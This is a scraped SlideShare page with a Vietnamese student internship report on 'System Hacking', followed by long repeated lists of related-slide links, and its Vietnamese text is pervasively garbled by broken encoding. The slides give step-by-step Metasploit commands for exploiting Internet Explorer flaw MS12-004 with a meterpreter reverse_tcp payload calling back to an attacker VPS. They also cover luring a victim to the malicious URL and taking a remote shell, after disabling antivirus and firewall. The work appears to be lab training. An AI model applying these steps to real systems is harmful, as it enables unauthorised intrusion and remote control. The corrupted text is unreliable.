際際滷

際際滷Share a Scribd company logo
畛 ti: System Hacking
Sinh vi棚n:
Tr畉n Vn V畛nh
Nguy畛n Minh Ti畉n
 M畛c ti棚u:
Th畛c hi畛n t畉n c担ng m叩y Victeam th担ng qua m叩y ch畛 畉o VPS.
 N畛i dung:
- Ci 畉t Metasploit Framework tr棚n VPS.
- Khai th叩c l畛i Internet Explorer th担ng qua VPS (ms12_004).
- Khai th叩c l畛i Microsoft Word MS12_027 qua VPS.
- Demo l畛i.
- C畉m nh畉n v kinh nghi畛m r炭t ra sau k狸 th畛c t畉p.
I. Setup MSF tr棚n
VPS
 B動畛c 1 : Truy c畉p vo VPS b畉ng Remote Desktop
Connection
 B動畛c 2 : Download v ci 畉t MSF tr棚n VPS qua trang
ch畛: http://www.metasploit.com
I. Setup MSF tr棚n
VPS
 Sau khi t畉i v畛 ta ch畉y file setup 炭ng v畛i HDH c畛a VPS.
L動u 箪 : T畉t c叩c ch動董ng tr狸nh di畛t virus v firewall tr動畛c khi ci .
 K畉t qu畉 khi hon thnh ci 畉t
I. Setup MSF tr棚n
VPS
II. Khai th叩c l畛i Internet Explorer
ms12_004
 畉u ti棚n ta ng nh畉p vo m叩y ch畛 畉o VPS v ch畉y
MSF
 G探 search ms12_024 畛 t狸m m達 l畛i
II. Khai th叩c l畛i Internet Explorer
ms12_004
 Use exploit/windows/brower/ms12_004_midi
II. Khai th叩c l畛i Internet Explorer
ms12_004
 Set payload windows/meterpreter/reverse_tcp
II. Khai th叩c l畛i Internet Explorer
ms12_004
 Set srvhost v lhost =  ip c畛a m叩y t畉n c担ng .
(畛 但y l ip c畛a m叩y ch畛 畉o VPS)
II. Khai th叩c l畛i Internet Explorer
ms12_004
 Set uripath = 動畛ng d畉n  .
II. Khai th叩c l畛i Internet Explorer
ms12_004
 V exploit 畛 kh畛i 畛ng server
II. Khai th叩c l畛i Internet Explorer
ms12_004
 L畉y m叩y n畉n nh但n truy c畉p vo 動畛ng d畉n m ta 達 t畉o
ra
II. Khai th叩c l畛i Internet Explorer
ms12_004
 Sau m畛t kho畉ng th畛i gian => X但m nh畉p thnh c担ng
m叩y n畉n nh但n .
II. Khai th叩c l畛i Internet Explorer
ms12_004
 D湛ng l畛nh sessions I  id c畛a session mu畛n vo  畛 th畛c hi畛n t畉n
c担ng .
 L畛nh sysinfo 畛 xem th担ng tin m叩y v l畛nh shell 畛 i畛u khi畛n cmd
c畛a m叩y n畉n nh但n .
II. Khai th叩c l畛i Internet Explorer
ms12_004
III. Khai th叩c l畛i Office
word MS12_027
 Demo ch動董ng tr狸nh:
https://www.youtube.com/watch?v=IH11i482w5o
IV. C畉m nh畉n v kinh nghi畛m
r炭t ra sau k狸 th畛c t畉p
B畛 鱈ch v l箪
th炭
C畉m nh畉n
em l畉i nhi畛u
kinh nghi畛m
M担i tr動畛ng
lm vi畛c th但n
thi畛n
Th畉y c担 t畉n
t狸nh v畛i SV
 Kinh nghi畛m r炭t ra:
- Lm vi畛c theo nh坦m gi炭p hon thnh c担ng vi畛c hi畛u qu畉 v
d畛 dng h董n.
- N但ng cao 動畛c kh畉 nng t狸m hi畛u, ch畛n l畛c th担ng tin c畉n
thi畉t 畛i v畛i 畛 ti c畛a m狸nh.
- N但ng cao kh畉 nng lm vi畛c 畛c l畉p, bi畉t c叩ch t動 duy
ch鱈n ch畉n 畛 c坦 th畛 t畛 kh畉c ph畛c 1 s畛 l畛i c畉n thi畉t.
IV. C畉m nh畉n v kinh nghi畛m
r炭t ra sau k狸 th畛c t畉p
Bao caocuoiki

More Related Content

What's hot (20)

Ci 畉t kali linux tr棚n m叩y 畉o VMware
Ci 畉t kali linux tr棚n m叩y 畉o VMwareCi 畉t kali linux tr棚n m叩y 畉o VMware
Ci 畉t kali linux tr棚n m叩y 畉o VMware
Nguyen Stone
B叩o c叩o system hacking
B叩o c叩o system hackingB叩o c叩o system hacking
B叩o c叩o system hacking
Huynh Khang
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Li棚n H叩n
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
Vu Trung Kien
際際滷 b叩o c叩o: System Hacking
際際滷 b叩o c叩o: System Hacking際際滷 b叩o c叩o: System Hacking
際際滷 b叩o c叩o: System Hacking
Huynh Khang
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docxH動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
L棚 L達nh
Sql injection demo - it-slideshares.blogspot.com
Sql injection   demo - it-slideshares.blogspot.comSql injection   demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.com
phanleson
Kali linux
Kali linuxKali linux
Kali linux
T但n Tr畉n
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013   owasp top 10- 2013Security Bootcamp 2013   owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp
Tim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongTim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chong
Vu Trung Kien
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
Phuong Ngo
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Li棚n H叩n
Ki畛m th畛 b畉o m畉t web
Ki畛m th畛 b畉o m畉t webKi畛m th畛 b畉o m畉t web
Ki畛m th畛 b畉o m畉t web
Minh Tri Nguyen
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉oC叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
thach28
1
11
1
Chuc Thanh
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛cB叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
Loc Tran
B叩o C叩o Th畛 T畉p ISA Server 2006
B叩o C叩o Th畛 T畉p ISA Server 2006B叩o C叩o Th畛 T畉p ISA Server 2006
B叩o C叩o Th畛 T畉p ISA Server 2006
xeroxk
Botnet slide
Botnet slideBotnet slide
Botnet slide
Loc Nguyen
T狸m hi畛u isa 2006 v tri畛n khai h畛 th畛ng vpn site to site tr棚n isa 2006
T狸m hi畛u isa 2006 v tri畛n khai h畛    th畛ng vpn site to site tr棚n isa 2006T狸m hi畛u isa 2006 v tri畛n khai h畛    th畛ng vpn site to site tr棚n isa 2006
T狸m hi畛u isa 2006 v tri畛n khai h畛 th畛ng vpn site to site tr棚n isa 2006
Hate To Love
Ci 畉t kali linux tr棚n m叩y 畉o VMware
Ci 畉t kali linux tr棚n m叩y 畉o VMwareCi 畉t kali linux tr棚n m叩y 畉o VMware
Ci 畉t kali linux tr棚n m叩y 畉o VMware
Nguyen Stone
B叩o c叩o system hacking
B叩o c叩o system hackingB叩o c叩o system hacking
B叩o c叩o system hacking
Huynh Khang
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Li棚n H叩n
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
Vu Trung Kien
際際滷 b叩o c叩o: System Hacking
際際滷 b叩o c叩o: System Hacking際際滷 b叩o c叩o: System Hacking
際際滷 b叩o c叩o: System Hacking
Huynh Khang
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docxH動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
H動董ng d但n cai 味t kali linux tr棚n may ao vmware.docx
L棚 L達nh
Sql injection demo - it-slideshares.blogspot.com
Sql injection   demo - it-slideshares.blogspot.comSql injection   demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.com
phanleson
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013   owasp top 10- 2013Security Bootcamp 2013   owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp
Tim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongTim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chong
Vu Trung Kien
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
Phuong Ngo
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Li棚n H叩n
Ki畛m th畛 b畉o m畉t web
Ki畛m th畛 b畉o m畉t webKi畛m th畛 b畉o m畉t web
Ki畛m th畛 b畉o m畉t web
Minh Tri Nguyen
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉oC叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
C叩ch t畉o m達 畛c tr棚n kali linux v tri畛n khai tr棚n android 畉o
thach28
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛cB叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
B叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
Loc Tran
B叩o C叩o Th畛 T畉p ISA Server 2006
B叩o C叩o Th畛 T畉p ISA Server 2006B叩o C叩o Th畛 T畉p ISA Server 2006
B叩o C叩o Th畛 T畉p ISA Server 2006
xeroxk
Botnet slide
Botnet slideBotnet slide
Botnet slide
Loc Nguyen
T狸m hi畛u isa 2006 v tri畛n khai h畛 th畛ng vpn site to site tr棚n isa 2006
T狸m hi畛u isa 2006 v tri畛n khai h畛    th畛ng vpn site to site tr棚n isa 2006T狸m hi畛u isa 2006 v tri畛n khai h畛    th畛ng vpn site to site tr棚n isa 2006
T狸m hi畛u isa 2006 v tri畛n khai h畛 th畛ng vpn site to site tr棚n isa 2006
Hate To Love

Viewers also liked (16)

亠仄亳仂亳从舒 于亠舒
亠仄亳仂亳从舒 于亠舒亠仄亳仂亳从舒 于亠舒
亠仄亳仂亳从舒 于亠舒
Kapranowa
Program teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyProgram teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okky
juliana567
Presentasi novi
Presentasi noviPresentasi novi
Presentasi novi
oviehuseinsn
Mengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternateMengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternate
angga putra
Presentation3
Presentation3Presentation3
Presentation3
juliana567
VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16
huntam0113
General volunteer training - Youth Conference
General volunteer training - Youth ConferenceGeneral volunteer training - Youth Conference
General volunteer training - Youth Conference
huntam0113
Program pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahanProgram pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahan
oviehuseinsn
Dimitropoulou georgia
Dimitropoulou georgiaDimitropoulou georgia
Dimitropoulou georgia
marina sym
Youth Conference Chaperone Training
Youth Conference Chaperone TrainingYouth Conference Chaperone Training
Youth Conference Chaperone Training
huntam0113
Alstom
AlstomAlstom
Alstom
Hakkim Shajahan
Studyinfrance
StudyinfranceStudyinfrance
Studyinfrance
Hakkim Shajahan
Top 10 foods of france
Top 10 foods of franceTop 10 foods of france
Top 10 foods of france
Hakkim Shajahan
Inventors and inventions from france
Inventors and inventions from franceInventors and inventions from france
Inventors and inventions from france
Hakkim Shajahan
Alcatel lucent
Alcatel lucentAlcatel lucent
Alcatel lucent
Hakkim Shajahan
The importance-of-learning-french
The importance-of-learning-frenchThe importance-of-learning-french
The importance-of-learning-french
Hakkim Shajahan
亠仄亳仂亳从舒 于亠舒
亠仄亳仂亳从舒 于亠舒亠仄亳仂亳从舒 于亠舒
亠仄亳仂亳从舒 于亠舒
Kapranowa
Program teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyProgram teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okky
juliana567
Presentasi novi
Presentasi noviPresentasi novi
Presentasi novi
oviehuseinsn
Mengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternateMengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternate
angga putra
Presentation3
Presentation3Presentation3
Presentation3
juliana567
VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16
huntam0113
General volunteer training - Youth Conference
General volunteer training - Youth ConferenceGeneral volunteer training - Youth Conference
General volunteer training - Youth Conference
huntam0113
Program pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahanProgram pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahan
oviehuseinsn
Dimitropoulou georgia
Dimitropoulou georgiaDimitropoulou georgia
Dimitropoulou georgia
marina sym
Youth Conference Chaperone Training
Youth Conference Chaperone TrainingYouth Conference Chaperone Training
Youth Conference Chaperone Training
huntam0113
Top 10 foods of france
Top 10 foods of franceTop 10 foods of france
Top 10 foods of france
Hakkim Shajahan
Inventors and inventions from france
Inventors and inventions from franceInventors and inventions from france
Inventors and inventions from france
Hakkim Shajahan
The importance-of-learning-french
The importance-of-learning-frenchThe importance-of-learning-french
The importance-of-learning-french
Hakkim Shajahan

Similar to Bao caocuoiki (20)

Tuan5
Tuan5Tuan5
Tuan5
V動董ng Nguy畛n
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
u D動董ng B狸nh
BO CO TH畛C T畉P - TU畉N 6
BO CO TH畛C T畉P - TU畉N 6BO CO TH畛C T畉P - TU畉N 6
BO CO TH畛C T畉P - TU畉N 6
kakawpah0911
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3
VNG
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
u D動董ng B狸nh
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477
oncestar
BO CO TH畛C T畉P ATHENA - TU畉N 6
BO CO TH畛C T畉P ATHENA - TU畉N 6BO CO TH畛C T畉P ATHENA - TU畉N 6
BO CO TH畛C T畉P ATHENA - TU畉N 6
phanconghien
Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3
eragon226
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
laonap166
B叩o c叩o th畛c t畉p
B叩o c叩o th畛c t畉pB叩o c叩o th畛c t畉p
B叩o c叩o th畛c t畉p
Tr畉n Hi畛u
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
Seavar Neuvell
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
Seavar Neuvell
B叩o C叩o Hng Tu畉n
B叩o C叩o Hng Tu畉nB叩o C叩o Hng Tu畉n
B叩o C叩o Hng Tu畉n
Bin Hoo
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web applicationC担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
ducmanhkthd
Bao cao
Bao caoBao cao
Bao cao
Chuc Thanh
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5
Thanh Tuan Ngo
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
Huy Ti畉n
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
Loc Tran
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
BO CO TH畛C T畉P - TU畉N 6
BO CO TH畛C T畉P - TU畉N 6BO CO TH畛C T畉P - TU畉N 6
BO CO TH畛C T畉P - TU畉N 6
kakawpah0911
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3
VNG
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
u D動董ng B狸nh
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477
oncestar
BO CO TH畛C T畉P ATHENA - TU畉N 6
BO CO TH畛C T畉P ATHENA - TU畉N 6BO CO TH畛C T畉P ATHENA - TU畉N 6
BO CO TH畛C T畉P ATHENA - TU畉N 6
phanconghien
Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3
eragon226
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
laonap166
B叩o c叩o th畛c t畉p
B叩o c叩o th畛c t畉pB叩o c叩o th畛c t畉p
B叩o c叩o th畛c t畉p
Tr畉n Hi畛u
B叩o C叩o Hng Tu畉n
B叩o C叩o Hng Tu畉nB叩o C叩o Hng Tu畉n
B叩o C叩o Hng Tu畉n
Bin Hoo
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web applicationC担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
C担ng c畛 v ph動董ng ph叩p ph叩t hi畛n l畛 h畛ng b畉o m畉t web application
ducmanhkthd
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5
Thanh Tuan Ngo
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
Huy Ti畉n
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
際際滷 b叩o c叩o cu畛i k狸 system hacking-Tr畉n Nguy畛n L畛c
Loc Tran

Bao caocuoiki

  • 1. 畛 ti: System Hacking Sinh vi棚n: Tr畉n Vn V畛nh Nguy畛n Minh Ti畉n
  • 2. M畛c ti棚u: Th畛c hi畛n t畉n c担ng m叩y Victeam th担ng qua m叩y ch畛 畉o VPS. N畛i dung: - Ci 畉t Metasploit Framework tr棚n VPS. - Khai th叩c l畛i Internet Explorer th担ng qua VPS (ms12_004). - Khai th叩c l畛i Microsoft Word MS12_027 qua VPS. - Demo l畛i. - C畉m nh畉n v kinh nghi畛m r炭t ra sau k狸 th畛c t畉p.
  • 3. I. Setup MSF tr棚n VPS B動畛c 1 : Truy c畉p vo VPS b畉ng Remote Desktop Connection
  • 4. B動畛c 2 : Download v ci 畉t MSF tr棚n VPS qua trang ch畛: http://www.metasploit.com I. Setup MSF tr棚n VPS
  • 5. Sau khi t畉i v畛 ta ch畉y file setup 炭ng v畛i HDH c畛a VPS. L動u 箪 : T畉t c叩c ch動董ng tr狸nh di畛t virus v firewall tr動畛c khi ci . K畉t qu畉 khi hon thnh ci 畉t I. Setup MSF tr棚n VPS
  • 6. II. Khai th叩c l畛i Internet Explorer ms12_004 畉u ti棚n ta ng nh畉p vo m叩y ch畛 畉o VPS v ch畉y MSF
  • 7. G探 search ms12_024 畛 t狸m m達 l畛i II. Khai th叩c l畛i Internet Explorer ms12_004
  • 8. Use exploit/windows/brower/ms12_004_midi II. Khai th叩c l畛i Internet Explorer ms12_004
  • 9. Set payload windows/meterpreter/reverse_tcp II. Khai th叩c l畛i Internet Explorer ms12_004
  • 10. Set srvhost v lhost = ip c畛a m叩y t畉n c担ng . (畛 但y l ip c畛a m叩y ch畛 畉o VPS) II. Khai th叩c l畛i Internet Explorer ms12_004
  • 11. Set uripath = 動畛ng d畉n . II. Khai th叩c l畛i Internet Explorer ms12_004
  • 12. V exploit 畛 kh畛i 畛ng server II. Khai th叩c l畛i Internet Explorer ms12_004
  • 13. L畉y m叩y n畉n nh但n truy c畉p vo 動畛ng d畉n m ta 達 t畉o ra II. Khai th叩c l畛i Internet Explorer ms12_004
  • 14. Sau m畛t kho畉ng th畛i gian => X但m nh畉p thnh c担ng m叩y n畉n nh但n . II. Khai th叩c l畛i Internet Explorer ms12_004
  • 15. D湛ng l畛nh sessions I id c畛a session mu畛n vo 畛 th畛c hi畛n t畉n c担ng . L畛nh sysinfo 畛 xem th担ng tin m叩y v l畛nh shell 畛 i畛u khi畛n cmd c畛a m叩y n畉n nh但n . II. Khai th叩c l畛i Internet Explorer ms12_004
  • 16. III. Khai th叩c l畛i Office word MS12_027 Demo ch動董ng tr狸nh: https://www.youtube.com/watch?v=IH11i482w5o
  • 17. IV. C畉m nh畉n v kinh nghi畛m r炭t ra sau k狸 th畛c t畉p B畛 鱈ch v l箪 th炭 C畉m nh畉n em l畉i nhi畛u kinh nghi畛m M担i tr動畛ng lm vi畛c th但n thi畛n Th畉y c担 t畉n t狸nh v畛i SV
  • 18. Kinh nghi畛m r炭t ra: - Lm vi畛c theo nh坦m gi炭p hon thnh c担ng vi畛c hi畛u qu畉 v d畛 dng h董n. - N但ng cao 動畛c kh畉 nng t狸m hi畛u, ch畛n l畛c th担ng tin c畉n thi畉t 畛i v畛i 畛 ti c畛a m狸nh. - N但ng cao kh畉 nng lm vi畛c 畛c l畉p, bi畉t c叩ch t動 duy ch鱈n ch畉n 畛 c坦 th畛 t畛 kh畉c ph畛c 1 s畛 l畛i c畉n thi畉t. IV. C畉m nh畉n v kinh nghi畛m r炭t ra sau k狸 th畛c t畉p